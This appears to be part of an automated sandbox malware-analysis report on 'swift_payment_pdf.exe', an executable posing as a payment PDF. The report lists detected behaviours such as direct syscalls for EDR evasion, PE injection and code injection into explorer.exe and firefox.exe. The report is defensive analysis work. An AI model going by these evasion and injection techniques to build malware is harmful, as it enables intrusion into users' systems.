            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137EB20 mov eax, dword ptr fs:[00000030h]5_2_0137EB20
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CEB1D mov eax, dword ptr fs:[00000030h]5_2_013CEB1D
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01424B00 mov eax, dword ptr fs:[00000030h]5_2_01424B00
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0134CB7E mov eax, dword ptr fs:[00000030h]5_2_0134CB7E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01348B50 mov eax, dword ptr fs:[00000030h]5_2_01348B50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01418B28 mov eax, dword ptr fs:[00000030h]5_2_01418B28
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01418B28 mov eax, dword ptr fs:[00000030h]5_2_01418B28
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FEB50 mov eax, dword ptr fs:[00000030h]5_2_013FEB50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013F8B42 mov eax, dword ptr fs:[00000030h]5_2_013F8B42
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6B40 mov eax, dword ptr fs:[00000030h]5_2_013E6B40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013E6B40 mov eax, dword ptr fs:[00000030h]5_2_013E6B40
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360BBE mov eax, dword ptr fs:[00000030h]5_2_01360BBE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360BBE mov eax, dword ptr fs:[00000030h]5_2_01360BBE
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358BF0 mov eax, dword ptr fs:[00000030h]5_2_01358BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358BF0 mov eax, dword ptr fs:[00000030h]5_2_01358BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358BF0 mov eax, dword ptr fs:[00000030h]5_2_01358BF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137EBFC mov eax, dword ptr fs:[00000030h]5_2_0137EBFC
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DCBF0 mov eax, dword ptr fs:[00000030h]5_2_013DCBF0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FEBD0 mov eax, dword ptr fs:[00000030h]5_2_013FEBD0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01404BB0 mov eax, dword ptr fs:[00000030h]5_2_01404BB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01404BB0 mov eax, dword ptr fs:[00000030h]5_2_01404BB0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350BCD mov eax, dword ptr fs:[00000030h]5_2_01350BCD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350BCD mov eax, dword ptr fs:[00000030h]5_2_01350BCD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01350BCD mov eax, dword ptr fs:[00000030h]5_2_01350BCD
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01370BCB mov eax, dword ptr fs:[00000030h]5_2_01370BCB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01370BCB mov eax, dword ptr fs:[00000030h]5_2_01370BCB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01370BCB mov eax, dword ptr fs:[00000030h]5_2_01370BCB
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01374A35 mov eax, dword ptr fs:[00000030h]5_2_01374A35
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01374A35 mov eax, dword ptr fs:[00000030h]5_2_01374A35
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0137EA2E mov eax, dword ptr fs:[00000030h]5_2_0137EA2E
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138CA24 mov eax, dword ptr fs:[00000030h]5_2_0138CA24
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013DCA11 mov eax, dword ptr fs:[00000030h]5_2_013DCA11
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CCA72 mov eax, dword ptr fs:[00000030h]5_2_013CCA72
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013CCA72 mov eax, dword ptr fs:[00000030h]5_2_013CCA72
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138CA6F mov eax, dword ptr fs:[00000030h]5_2_0138CA6F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138CA6F mov eax, dword ptr fs:[00000030h]5_2_0138CA6F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0138CA6F mov eax, dword ptr fs:[00000030h]5_2_0138CA6F
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013FEA60 mov eax, dword ptr fs:[00000030h]5_2_013FEA60
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01356A50 mov eax, dword ptr fs:[00000030h]5_2_01356A50
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360A5B mov eax, dword ptr fs:[00000030h]5_2_01360A5B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01360A5B mov eax, dword ptr fs:[00000030h]5_2_01360A5B
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358AA0 mov eax, dword ptr fs:[00000030h]5_2_01358AA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01358AA0 mov eax, dword ptr fs:[00000030h]5_2_01358AA0
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_013A6AA4 mov eax, dword ptr fs:[00000030h]5_2_013A6AA4
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_01388A90 mov edx, dword ptr fs:[00000030h]5_2_01388A90
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeCode function: 5_2_0135EA80 mov eax, dword ptr fs:[00000030h]5_2_0135EA80
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeMemory written: C:\Users\user\Desktop\swift_payment_pdf.exe base: 400000 value starts with: 4D5AJump to behavior
            Injects code into the Windows Explorer (explorer.exe)
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeMemory written: PID: 7980 base: 2EE0000 value: 00Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeMemory written: PID: 7980 base: 2DF82D8 value: 00Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeMemory written: PID: 7980 base: 2DF91E8 value: 00Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 8156Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\explorer.exeThread APC queued: target process: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeProcess created: C:\Users\user\Desktop\swift_payment_pdf.exe "C:\Users\user\Desktop\swift_payment_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\PGIzXOBshIiSnGcNkZxrkfaOPtrgbMvqBOSRsBsN\AbWHWpocGREf.exeProcess created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: AbWHWpocGREf.exe, 00000006.00000003.2193822463.000000000520F000.00000004.00000001.00020000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000003.2192638369.0000000004DAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: f+SDefaultShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells/NoUACCheck/NoShellRegistrationAndUACCheck/NoShellRegistrationCheckProxy DesktopProgmanLocal\ExplorerIsShellMutex
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: AbWHWpocGREf.exe, 00000006.00000000.2178631371.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000006.00000002.3554251714.0000000001AE0000.00000002.00000001.00040000.00000000.sdmp, AbWHWpocGREf.exe, 00000008.00000000.2318917603.0000000000D10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Users\user\Desktop\swift_payment_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\swift_payment_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
